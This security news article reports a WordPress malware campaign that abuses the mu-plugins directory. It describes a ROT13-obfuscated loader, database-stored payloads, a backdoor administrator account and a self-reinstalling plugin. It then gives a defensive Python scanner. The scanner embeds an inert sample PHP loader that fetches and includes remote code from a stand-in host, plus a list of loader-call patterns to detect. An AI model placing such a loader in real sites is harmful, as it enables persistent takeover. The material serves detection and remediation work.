Security researchers have discovered a sophisticated malware campaign targeting WordPress websites by exploiting a little-known but powerful feature: the Must-Use (“mu-plugins”) plugins directory.
This method, previously observed in similar attacks earlier this year, is raising alarm among WordPress administrators due to its persistence and difficulty of detection.
ROT13 Obfuscation Aids Loader Stealth
The current attack centers on a discreetly placed file, wp-index.php, embedded in the wp-content/mu-plugins/ directory.
As must-use plugins, files in this location are automatically executed by WordPress and cannot be deactivated through the standard admin dashboard.
The malicious loader employs ROT13 obfuscation, a simple, reversible cipher that shifts each letter 13 places in the alphabet, to conceal a remote URL. This obfuscation, while trivial to reverse, helps evade casual inspection and basic automated scans.
Once the loader decodes the ROT13 string, it fetches a payload from the remote resource, temporarily stores the content as a base64-encoded string inside a WordPress database option (_hdra_core), and dynamically executes the code.
The loader writes the payload to a temporary PHP file in the uploads directory, includes it for execution, and then deletes the file almost immediately, a tactic designed to minimize forensic traces on disk.
Upon analysis, the retrieved payload, hosted on the attacker-controlled cron.php resource, revealed a multi-faceted malware framework.
Notably, it injects a concealed file manager script into a theme directory, granting attackers ongoing access to file operations like browsing, uploading, and deleting. This file manager is protected by a hardcoded HTTP header token.
To expand control and maintain persistence, the malware creates a new administrator-level user, officialwp, and forcibly sets or resets passwords associated with common admin usernames, including admin, root, wpsupport, and the newly created backdoor account.
By programmatically resetting passwords to attacker-controlled values, adversaries ensure they can regain privileged access even if legitimate administrators attempt to remediate the breach.
Further, the malware downloads and activates an additional rogue plugin (wp-bot-protect.php) from another obfuscated URL.
This component acts as a secondary backdoor and self-healing mechanism, reinstating the infection should cleanup efforts target only the initial loader.
Potential Impact
With full administrator privileges, attackers can deploy additional malware, alter website content, or exfiltrate sensitive data.
According to Sucuri, the ability to execute arbitrary PHP code remotely enables ongoing command execution and further adaptation of attack techniques.
Website owners face heightened risk, including defacement, data breaches, ransomware deployment, or inclusion in broader botnet attacks against third-party targets.
What makes this campaign particularly concerning is its combination of deep persistence (leveraging mu-plugins for automatic execution and database-based payload storage) with mechanisms to conceal indicators of compromise, bypass common defenses, and actively resist standard cleanup actions.
By disguising communications through simple obfuscation and removing traces after code execution, the threat actors have constructed a resilient and surreptitious backdoor.
In light of these findings, security professionals and site administrators are urged to audit the mu-plugins directory, review user accounts for unauthorized administrators, and scan for unexpected database options or hidden payloads within the WordPress environment.
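As an added example (not code from Sucuri or from the article), the following Python scanner implements the mu-plugins audit suggested here: it walks the directory, decodes any string literal passed to str_rot13(), flags literals that decode to a URL, and counts the loader-style calls described above (option storage, temp-file write, include, unlink). The sample loader text, its example.com URL and the file path are constructed for illustration and are never executed.

```python
import codecs
import re
import sys
from pathlib import Path

# Constructed sample: an inert stand-in for the loader pattern the article
# describes (rotated URL literal, option storage, temp-file include, unlink).
# It is only ever scanned as text, never run.
SAMPLE_LOADER = r"""<?php
$u = str_rot13('uggcf://rknzcyr.pbz/peba.cuc');
$c = base64_encode(file_get_contents($u));
update_option('_hdra_core', $c);
$f = WP_CONTENT_DIR . '/uploads/tmp.php';
file_put_contents($f, base64_decode($c));
include $f;
unlink($f);
"""

ROT13_LITERAL = re.compile(r"str_rot13\(\s*['\"]([^'\"]+)['\"]\s*\)")
URL_RE = re.compile(r"^https?://", re.I)
# Calls that, taken together, match the write-include-delete loader behaviour.
LOADER_CALLS = ("eval(", "include", "file_put_contents(", "unlink(",
                "update_option(", "base64_decode(")

def decode_rot13_literals(source):
    """Return every str_rot13() literal in source that decodes to a URL."""
    urls = []
    for literal in ROT13_LITERAL.findall(source):
        decoded = codecs.decode(literal, "rot13")
        if URL_RE.match(decoded):
            urls.append(decoded)
    return urls

def score_source(source):
    """Return (decoded URLs, loader-style calls present) for one PHP source."""
    return decode_rot13_literals(source), [c for c in LOADER_CALLS if c in source]

def scan_mu_plugins(mu_dir):
    """Scan every .php file under mu_dir; return a list of (path, urls, calls).
    A file is reported if it hides a URL behind ROT13 or uses three or more
    of the loader-style calls."""
    findings = []
    for path in Path(mu_dir).rglob("*.php"):
        urls, calls = score_source(path.read_text(errors="replace"))
        if urls or len(calls) >= 3:
            findings.append((str(path), urls, calls))
    return findings

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "wp-content/mu-plugins"
    for path, urls, calls in scan_mu_plugins(target):
        print(f"{path}: rot13 urls={urls} loader calls={calls}")
```

Pair the file scan with a query for unexpected wp_options rows and a listing of administrator accounts, since the article notes the payload lives in the database and the backdoor user is the persistence anchor.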
Swift detection and remediation are critical as attackers continue to refine and deploy discreet backdoors into the WordPress ecosystem.